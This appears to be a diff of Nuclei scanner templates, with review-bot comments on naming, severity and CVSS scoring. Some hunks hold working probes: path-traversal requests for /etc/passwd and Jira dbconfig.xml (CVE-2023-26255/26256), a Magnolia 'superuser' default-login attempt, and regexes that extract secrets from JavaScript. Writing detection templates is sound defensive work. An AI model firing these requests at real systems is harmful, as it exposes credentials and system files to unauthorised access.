part: body_3
words:
- "Edit Profile"
extractors:
- type: regex
part: body
name: siteid
group: 1
internal: true
regex:
- 'siteid:"(.*?)"'
- type: regex
part: body
name: uuid
group: 1
internal: true
regex:
- '"lastupdatebyid":"([A-F0-9-]+)"'
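Review bot: `shodan-query: 'Generator: Musa CMS'` misspells the product; the template is for Mura CMS (see `name` and `tags`), so the query as written will not surface the intended hosts and should read `shodan-query: 'Generator: Mura CMS'`. The reference `http://mura.com` is a bare vendor root over plain HTTP and is already covered by `https://www.murasoftware.com/mura-cms/`; drop it or change it to the https form.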


@ -0,0 +1,41 @@
id: CVE-2023-26255
info:
name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-26255
- https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-26255
cwe-id: CWE-22
metadata:
shodan-query: title:Jira
tags: cve,cve2023,lfi,jira,cms,atlassian
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<jira-database-config>"
- type: word
part: header
words:
- '$textMime'
- type: status
status:
- 200
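Review bot: The request path asks for `fileName=../dbconfig.xmlpasswd`, which reads like `dbconfig.xml` and `passwd` run together, while the body matcher expects `<jira-database-config>`, the root element of dbconfig.xml; with the filename as written the matcher cannot be satisfied and the template will silently never fire. The filename and the matcher need to agree on one target file, as the sibling CVE-2023-26256 template does by pairing `etc/passwd` with `root:[x*]:0:0`. Both this template and CVE-2023-26256 also carry the identical `name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion`, which is what cves.json in this commit shows for both entries; appending the affected endpoint (`snjCustomDesignConfig` here, `snjFooterNavigationConfig` there) would tell them apart in output.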


@ -0,0 +1,40 @@
id: CVE-2023-26256
info:
name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion
author: pikpikcu
severity: high
description: |
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-26256
- https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-26256
cwe-id: CWE-22
metadata:
shodan-query: title:Jira
tags: cve,cve2023,lfi,jira,cms,atlassian
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: header
words:
- '$textMime'
- type: status
status:
- 200


@ -1,17 +1,17 @@
id: lutron-default-login
info:
name: Lutron - Default Login
name: Lutron - Default Account
author: geeknik
severity: high
severity: critical
description: Multiple Lutron devices contain a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.lutron.com
- https://vulners.com/openvas/OPENVAS:1361412562310113206
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1391
tags: default-login,lutron,iot
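Review bot: The classification now uses `cwe-id: CWE-1391`, which is "Use of Weak Credentials"; for a default-account finding the more specific child, CWE-1392 "Use of Default Credentials", looks like the better fit and is worth checking against the CWE ids the repository's other default-login templates use. The new `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` is consistent with the 9.8 score and `severity: critical`, so the rest of the hunk holds together.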
requests:


@ -0,0 +1,75 @@
id: magnolia-default-login
info:
name: Magnolia Default Login
author: pussycat0x
severity: high
description: Mangnolia CMS default credentials were discovered.
reference:
- https://www.magnolia-cms.com/
metadata:
verified: "true"
shodan-query: html:"Magnolia is a registered trademark"
tags: magnolia,default-login
requests:
- raw:
- |
GET /.magnolia/admincentral HTTP/1.1
Host: {{Hostname}}
- |
POST /.magnolia/admincentral HTTP/1.1
Host: {{Hostname}}
Cookie: csrf={{csrf}};JSESSIONID={{session}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{BaseURL}}/.magnolia/admincentral
mgnlUserId={{username}}&mgnlUserPSWD={{password}}&csrf={{csrf}}
- |
GET /.magnolia/admincentral/PUSH?v-uiId=1 HTTP/1.1
Host: {{Hostname}}
Cookie: csrf={{csrf}}; JSESSIONID={{session}}
payloads:
username:
- superuser
password:
- superuser
attack: pitchfork
extractors:
- type: kval
name: csrf
part: header
internal: true
kval:
- csrf
- type: kval
name: session
internal: true
part: header
kval:
- JSESSIONID
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '"changes":'
- '"resources":'
condition: and
- type: word
part: header_3
words:
- 'application/json'
- type: status
status:
- 200
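Review bot: `description: Mangnolia CMS default credentials were discovered.` misspells the product name; it should read `description: Magnolia CMS default credentials were discovered.`. The template also has `severity: high` with no `classification` block, whereas the Lutron default-login template touched in this same commit is moved to `severity: critical` with a `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` vector and a default-credentials CWE; a default superuser login on a CMS admin console is the same class of finding, so the severity and classification here should probably be aligned with that rather than left unclassified.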


@ -0,0 +1,33 @@
id: magnolia-panel
info:
name: Magnolia Panel - Detect
author: pussycat0x
severity: info
description: |
Magnolia CMS is a powerful and versatile content management system that provides users with a host of features and options for web development. It offers a wide range of capabilities to help create a website that is both attractive and effective.
reference:
- https://www.magnolia-cms.com/
metadata:
verified: "true"
shodan-query: html:"Magnolia is a registered trademark"
tags: magnolia,panel,login
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/.magnolia/admincentral"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Magnolia is a registered trademark'
- type: word
part: header
words:
- "text/html"
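Review bot: The `description` reads as product marketing ("powerful and versatile", "attractive and effective") rather than stating what a match means, unlike the `<X> panel was detected.` form the other panel templates in this commit use; `description: Magnolia CMS admin panel was detected.`. The matchers also carry no `- type: status` check, which the sibling panel templates pair with their body and header words; with `stop-at-first-match: true` over two paths that may be intentional, but a short comment saying so would spare the next reviewer the question.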


@ -6,8 +6,8 @@ info:
severity: high
description: MyBB installation panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cwe-id: CWE-200
metadata:
verified: true
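Review bot: Three installer-page detections in this commit end up with three different ratings for the same finding class: this hunk keeps `severity: high` with the new 8.6 vector, the osticket-install hunk moves to `severity: critical` with 9.4, and the new magnolia-installer template is `severity: info` with no classification at all. An exposed installer is the same class of risk whichever product it belongs to, so the three should agree; pick one vector and severity and apply it to all three. `severity:` here is a context line, so whether 8.6 was meant to stay `high` or follow osticket to `critical` is not visible in the hunk.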


@ -3,12 +3,12 @@ id: osticket-install
info:
name: osTicket Installer Panel - Detect
author: ritikchaddha
severity: high
severity: critical
description: osTicket installer panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
cvss-score: 9.4
cwe-id: CWE-284
metadata:
verified: true
shodan-query: http.title:"osTicket Installer"


@ -1,34 +1,34 @@
id: saltstack-config-panel
info:
name: SaltStack Config Panel - Detect
author: pussycat0x
severity: info
description: |
SaltStack config panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"SaltStack Config"
tags: panel,vmware,login,saltstack
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SaltStack Config"
- type: status
status:
- 200
# Enhanced by cs 01/26/2023
id: saltstack-config-panel
info:
name: SaltStack Config Panel - Detect
author: pussycat0x
severity: info
description: |
SaltStack config panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"SaltStack Config"
tags: panel,vmware,login,saltstack
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SaltStack Config"
- type: status
status:
- 200
# Enhanced by cs 01/26/2023


@ -6,8 +6,8 @@ info:
severity: info
description: Apache Solr admin panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true


@ -0,0 +1,26 @@
id: veriz0wn-osint
info:
name: Veriz0wn OSINT - Detect
author: pussycat0x
severity: info
metadata:
verified: "true"
shodan-query: title:"Veriz0wn"
tags: veriz0wn,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Veriz0wn : OSINT"
- type: status
status:
- 200
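Review bot: The `info:` block has no `description`, which every other detection template in this commit carries and which downstream reporting displays; `description: Veriz0wn OSINT panel was detected.`. The name `Veriz0wn OSINT - Detect` and the tags `veriz0wn,panel` do not say what Veriz0wn is, so a one-line description is the only place a reader learns that; the body word `Veriz0wn : OSINT` suggests the web front end of an OSINT tool, but I would confirm that before wording it.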


@ -1,35 +1,35 @@
id: wagtail-login
info:
name: Wagtail Login - Detect
author: kishore-hariram
severity: info
description: The Wagtail panel has been detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Wagtail - Sign in"
tags: panel,wagtail
requests:
- method: GET
path:
- '{{BaseURL}}/login/?next=/'
- '{{BaseURL}}/admin/login/?next=/admin/'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Wagtail - Sign in'
- type: status
status:
- 200
# Enhanced by cs 01/23/2023
id: wagtail-login
info:
name: Wagtail Login - Detect
author: kishore-hariram
severity: info
description: The Wagtail panel has been detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Wagtail - Sign in"
tags: panel,wagtail
requests:
- method: GET
path:
- '{{BaseURL}}/login/?next=/'
- '{{BaseURL}}/admin/login/?next=/admin/'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Wagtail - Sign in'
- type: status
status:
- 200
# Enhanced by cs 01/23/2023


@ -10,9 +10,9 @@ info:
- https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
- https://github.com/projectdiscovery/nuclei-templates/blob/master/file/logs/django-framework-
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200exceptions.yaml
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
tags: exposure,config,django
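Review bot: The reference ending in `django-framework-` is still truncated on the new side: the removed line `cwe-id: CWE-200exceptions.yaml` shows where the tail of that URL had been fused, and this hunk drops the fragment from `cwe-id` without restoring it to the reference, so the link remains incomplete. It should read `- https://github.com/projectdiscovery/nuclei-templates/blob/master/file/logs/django-framework-exceptions.yaml`. The reference list starts above the hunk, so any earlier entries are not visible here.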


@ -8,8 +8,8 @@ info:
reference:
- https://gruntjs.com/sample-gruntfile
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure


@ -3,12 +3,12 @@ id: htpasswd-detection
info:
name: Apache htpasswd Config - Detect
author: geeknik
severity: info
severity: high
description: Apache htpasswd configuration was detected.
reference: https://httpd.apache.org/docs/current/programs/htpasswd.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: config,exposure
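Review bot: The vector moves to `C:H` and `severity: high` because an exposed htpasswd file discloses stored credential hashes, yet `cwe-id: CWE-200` stays at generic information exposure; CWE-522 (Insufficiently Protected Credentials), which appears in the lutron template's previous classification in this same commit, describes that impact more precisely: `cwe-id: CWE-522`. Either way the `description` should state what the new severity rests on, e.g. `description: Apache htpasswd file containing user credential hashes was detected.`.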


@ -7,8 +7,8 @@ info:
description: Apache httpd configuration information was detected.
reference: https://httpd.apache.org/docs/current/configuring.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure,httpd


@ -7,8 +7,8 @@ info:
description: Jetbrains IDE DataSources configuration information was detected.
reference: https://www.jetbrains.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure,jetbrains


@ -8,8 +8,8 @@ info:
reference:
- https://issues.jboss.org/browse/KEYCLOAK-571
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: keycloak,config


@ -8,8 +8,8 @@ info:
reference:
- https://netbeans.apache.org/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: netbeans,config,exposure


@ -8,8 +8,8 @@ info:
reference:
- https://owncloud.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure


@ -7,8 +7,8 @@ info:
description: npm configuration information was detected. All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
reference: https://www.npmjs.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: config,exposure


@ -7,8 +7,8 @@ info:
description: phpspec configuration information was detected.
reference: https://phpspec.net/en/stable/cookbook/configuration.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true


@ -7,8 +7,8 @@ info:
description: Pipfile configuration information was detected.
reference: https://pypi.org/project
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true


@ -9,8 +9,8 @@ info:
- https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt
- https://github.com/rubocop/rubocop
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true


@ -0,0 +1,35 @@
id: reactapp-env-js
info:
name: React App Environment Js
author: random-robbie
severity: unknown
metadata:
verified: "true"
github-query: "REACT_APP_"
tags: react,exposure,config,js,javascript
requests:
- method: GET
path:
- "{{BaseURL}}/env.js"
- "{{BaseURL}}/config.js"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "REACT_APP_"
- type: word
part: header
words:
- "application/octet-stream"
- "application/javascript"
- "text/plain"
condition: or
- type: status
status:
- 200
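Review bot: The template has no `description`, and `severity: unknown` with no classification leaves a reader nothing to judge the finding by; `description: JavaScript file exposing REACT_APP_ environment configuration variables was detected.`. If `unknown` is deliberate pending triage, a comment saying so would help, since the other exposure templates touched in this commit use `info` with a 0.0 vector. The name `React App Environment Js` also lacks the `- Detect` suffix that the sibling detection templates carry.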


@ -0,0 +1,25 @@
id: set-hostname
info:
name: Ensure Hostname is Set
author: pussycat0x
severity: info
description: |
Ensure Hostname is set is a process that helps to ensure that the computer or device is being identified correctly on a network.
The hostname is a unique identifier for the device, and it is important that it is properly set so that other devices on the network can identify it.
reference: |
https://docs.netgate.com/pfsense/en/latest/config/general.html
tags: firewall,config,audit,pfsense,file
file:
- extensions:
- xml
matchers-condition: and
matchers:
- type: word
words:
- "<system>"
- "<hostname></hostname>"
- "domain>"
condition: and
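Review bot: `reference: |` makes the reference a literal block string ending in a newline rather than the list of URLs the other templates use, so tooling that iterates `reference` entries sees one opaque string; write it as `reference:` followed by `  - https://docs.netgate.com/pfsense/en/latest/config/general.html`. The `description` explains why a hostname matters but not what a match means: the words matcher fires on `<hostname></hostname>`, i.e. an empty hostname element, so the description should say that an empty hostname was found in the pfSense configuration XML. The `"domain>"` word is a partial tag and would be clearer as `"<domain>"` if the opening tag is what is meant.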

33
file/js/js-analyse.yaml Normal file

@ -0,0 +1,33 @@
id: js-analyse
info:
name: JS Analyse
author: ayadim
severity: info
description: |
This process involves extracting tokens, endpoints, URIs, and variable names from the JS file and analyzing them for any potential weaknesses that could be exploited. By extracting and analyzing these elements, potential security threats can be identified, allowing for proactive measures to be taken to mitigate any risks associated with the application. This process can be used as part of a comprehensive bug-hunting strategy to ensure the security of an application.
metadata:
verified: "true"
tags: file,js-analyse,js,javascript
file:
- extensions:
- js
extractors:
- type: regex
name: extracted-token
regex:
- "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+"
- type: regex
name: extracted-endpoints
regex:
- "(?i)('|\")((\\.{0,2})|([a-z0-9-_]*))/([a-z0-9-_/=:&?\\.]+)('|\")"
- "(?i)}\\s*/[a-z0-9-_?=&/]+"
- "(?i)path\\s*(:|=)\\s*('|\")[a-z0-9-_?=&:\\./]+('|\")"
- type: regex
name: extracted-uri
regex:
- "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&-_=:]+"
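Review bot: In the `extracted-uri` regex, `&-_` inside the character class is parsed as a range from `&` (0x26) to `_` (0x5F), which silently admits uppercase letters, digits and a dozen punctuation characters instead of the three literal characters presumably intended; move the hyphen to the end of the class, `- "(?i)([a-z]{0,10}):(//|/)[a-z0-9\\./?&_=:-]+"`. In the `extracted-token` regex, `[-|_]` is a character class, so the `|` is a literal pipe rather than alternation; `[-_]` is the intent if the separators are hyphen and underscore. The `description` also reads as a process essay; a one-line statement of what the three extractors return would serve readers better.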


@ -1 +1 @@
4.3.2
4.3.3


@ -1 +1 @@
6.4.2
6.4.2.1


@ -1 +1 @@
3.42
3.43


@ -1 +1 @@
1.5.2.1
1.5.3


@ -1 +1 @@
3.11.3
3.11.5


@ -1 +1 @@
3.0.14
3.0.15


@ -1 +1 @@
4.3.24
4.3.25


@ -1 +1 @@
6.1.1
6.1.2


@ -1 +1 @@
8.12.1
8.13.1


@ -1 +1 @@
2.4.0
2.4.1


@ -1 +1 @@
1.95.0
1.96.0


@ -1 +1 @@
2.9.15
3.0.2


@ -1 +1 @@
3.0.23
3.0.26


@ -1 +1 @@
4.8.0
4.8.1


@ -1 +1 @@
4.4.0.1
4.4.0.2


@ -1 +1 @@
3.2.2
3.2.4


@ -1 +1 @@
7.6.7
7.6.8


@ -1 +1 @@
3.6.19
3.6.20


@ -1 +1 @@
2.12.2
2.13.0


@ -1 +1 @@
1.8.13
1.8.14


@ -1 +1 @@
2.4.4
2.4.5


@ -1 +1 @@
1.0.110
1.0.110.1


@ -1 +1 @@
1.46.6
1.46.7


@ -1 +1 @@
1.23.1
1.23.3


@ -1 +1 @@
4.63.2
4.63.3


@ -1 +1 @@
2.0.2
2.0.3


@ -1 +1 @@
2.2.3
2.2.4


@ -1 +1 @@
7.4.1
7.5.0


@ -1 +1 @@
20.2.1
20.3


@ -1 +1 @@
9.0.17
9.0.18


@ -1 +1 @@
3.2.12
3.2.13


@ -1,39 +0,0 @@
id: lutron-iot-default-login
info:
name: Lutron IOT Device Default Login Panel - Detect
author: geeknik
severity: high
description: Lutron IOT Device Default login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference:
- https://www.lutron.com
tags: iot,default-login,lutron,panel
requests:
- method: GET
path:
- "{{BaseURL}}/login?login=lutron&password=lutron"
matchers-condition: and
matchers:
- type: word
words:
- "<TITLE>LUTRON</TITLE>"
- ">DeviceIP</A>"
- ">Get Database Info as XML</A>"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2023/01/29


@ -23,5 +23,3 @@ requests:
part: body
regex:
- (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118
# Enhanced by md on 2022/09/19


@ -0,0 +1,40 @@
id: apache-nifi-unauth
info:
name: Apache NiFi - Unauthenticated Access
author: pwnhxl
severity: high
description: |
Apache NiFi server was able to be accessed because no authentication was required.
reference: |
- https://github.com/jm0x0/apache_nifi_processor_rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cwe-id: CWE-285
metadata:
verified: "true"
shodan-query: title:"NiFi"
fofa-query: title="nifi" && body="Did you mean"
tags: misconfig,apache,nifi,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/nifi-api/access/config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"supportsLogin":false}'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
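Review bot: `reference: |` followed by `- https://github.com/jm0x0/apache_nifi_processor_rce` yields a single literal string beginning with `- ` and ending in a newline rather than a one-element list, so the dash becomes part of the reference text; drop the block indicator and write `reference:` followed by `  - https://github.com/jm0x0/apache_nifi_processor_rce`. `cwe-id: CWE-285` (Improper Authorization) is defensible, but the description says no authentication was required at all, which is CWE-306 (Missing Authentication for Critical Function); `cwe-id: CWE-306`. The same `reference: |` block-scalar pattern appears in the set-hostname template added in this commit.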


@ -3,7 +3,7 @@ id: command-api-explorer
info:
name: Command API Explorer Panel - Detect
author: DhiyaneshDK
severity: low
severity: info
description: Command API Explorer panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -3,7 +3,7 @@ id: dgraph-dashboard-exposure
info:
name: Dgraph Ratel Dashboard Exposure Panel - Detect
author: dhiyaneshDk
severity: low
severity: info
description: Dgraph Ratel Dashboard Exposure panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N


@ -0,0 +1,31 @@
id: everything-listing
info:
name: Everything Server Exposure
author: pussycat0x
severity: high
description: |
Everything is a freeware desktop search utility for Windows that can rapidly find files and folders by name.
reference:
- https://www.voidtools.com/
metadata:
verified: 'true'
shodan-query: http.favicon.hash:-977323269
tags: exposure,everything,listing,voidtools
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Everything</title>"
- "indexof"
condition: and
- type: status
status:
- 200
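Review bot: The `description` describes the product, not the finding: the matchers require the `Everything` title together with `indexof`, which appears to be the utility's HTTP server exposing a browsable file index, and that is what a `severity: high` hit should say; `description: Everything search utility HTTP server exposing a browsable file index was detected.`. There is also no `classification:` block backing `high`, while the other exposure templates in this commit carry a CVSS vector. `verified: 'true'` is single-quoted where the rest of the commit double-quotes the same value.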


@ -0,0 +1,34 @@
id: magnolia-installer
info:
name: Magnolia CMS Installer
author: pussycat0x
severity: info
reference:
- https://www.magnolia-cms.com/
metadata:
verified: "true"
shodan-query: title:"Magnolia Installation"
tags: magnolia,exposure,installer
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "Magnolia Installation"
- "Welcome to Magnolia"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
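Review bot: The `info:` block has no `description`; the matchers fire on `Magnolia Installation` and `Welcome to Magnolia`, so `description: Magnolia CMS installation page was detected.` states what a hit means. A reachable installer is the same finding class as the mybb-install and osticket-install templates edited in this commit, both of which carry a `classification:` block with a non-zero vector, so whichever severity is settled on for them this template should carry the same rather than `severity: info` with no classification.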


@ -3,9 +3,9 @@ id: office365-open-redirect
info:
name: Office365 Autodiscover - Open Redirect
author: dhiyaneshDk
severity: low
severity: medium
description: Office365 Autodiscover contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: See https://learn.microsoft.com/en-us/outlook/troubleshoot/connectivity/how-to-suppress-autodiscover-redirect-warning for a workaround.
remediation: See the workaround detailed in the Medium post in the references.
reference:
- https://medium.com/@heinjame/office365-open-redirect-from-autodiscover-64284d26c168
classification:
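Review bot: The new `remediation:` line replaces the vendor's own workaround URL with an indirect pointer to a third-party blog post, and the `learn.microsoft.com` link is not moved into `reference:` either, so the only authoritative source is dropped from the template. Keep it as a reference entry: `- https://learn.microsoft.com/en-us/outlook/troubleshoot/connectivity/how-to-suppress-autodiscover-redirect-warning`. The reference list is fully visible in the hunk and holds only the Medium entry.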


@ -3,11 +3,11 @@ id: pghero-dashboard-exposure
info:
name: PgHero Dashboard Exposure Panel - Detect
author: DhiyaneshDk
severity: low
severity: medium
description: PgHero Dashboard Exposure panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
reference:
- https://github.com/ankane/pghero


@ -6,8 +6,8 @@ info:
severity: medium
description: Fastvue Dashboard panel was detected without authentication.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
metadata:
verified: true


@ -8,8 +8,8 @@ info:
reference:
- https://github.com/Tinram/MySQL-Brute
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: network,mysql,bruteforce,db


@ -1,9 +1,9 @@
id: 1001mem
info:
name: 1001mem
name: 1001mem User Name Information - Detect
author: dwisiswant0
description: This OSINT template looks for information about a user name.
description: 1001mem user name information check was conducted.
severity: info
classification:
